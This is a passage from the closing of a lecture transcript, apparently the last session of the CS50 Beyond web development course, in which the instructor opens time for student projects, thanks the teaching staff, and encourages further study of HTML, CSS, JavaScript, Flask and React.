  • a sense for the types of concerns to be aware of,

  • the types of things to be thinking about,

  • and the types of issues that will come about

  • if you decide to take a web application and begin to have more and more people

  • actually start to use it.

  • So questions about that or about any of the other topics

  • we've covered this week?

  • All right.

  • So with the remainder of this morning, between now and about 12:30 or so,

  • we'll leave it open to more project time, an opportunity

  • to work on any of the projects you've worked on

  • so far over the course of this week and also an opportunity to work

  • on something new if you would like to.

  • I know many of you yesterday decided to start on new projects, projects

  • of your own choosing built in React or Flask

  • or using JavaScript or any of the other technologies

  • we've talked about this week.

  • Before we conclude, though, I do have to say a couple of thank yous,

  • first to David for helping to advise the class, to the teaching fellows--

  • Josh and Christian and Athena and Julia--

  • for being excellent in helping to answer questions

  • and helping to make sure that the course can run smoothly, to Andrew up

  • in the back, who's been taking care of the production side of everything

  • over the course of this week, making sure that all the lectures are recorded

  • and making sure they're posted online, such that afterwards, you,

  • when you're here or when you're not here,

  • are able to come online to see them.

  • So thank you to everyone for helping to make the course possible.

  • Thank you to all of you for coming to the course.

  • Hope you enjoyed it.

  • Hope you got things out of it.

  • We've really only scratched the surface, though,

  • of a lot of the topics that we've covered

  • over the course of the past week.

  • There's a lot more to CSS and HTML and JavaScript and Flask and Python

  • and React than we were really able to touch on over the course of the week.

  • It was really meant to be more of an opportunity

  • to give you some exposure to some of the fundamentals of these ideas,

  • some of the tools and the concepts that you can ultimately

  • use as you begin to design web applications of your own.

  • So I do hope that you've learned something from the week but,

  • in particular, that you found things that are interesting to you, such

  • that you continue to take those ideas and explore them.

  • Go beyond just what we've been able to cover over the course of this week

  • and explore what else these technologies and these tools and these ideas

  • ultimately have to offer.

  • So thank you so much.

  • We'll stick around until 12:30 to help with project time.

  • [APPLAUSE]

  • But this was CS50 Beyond.

[MUSIC PLAYING]
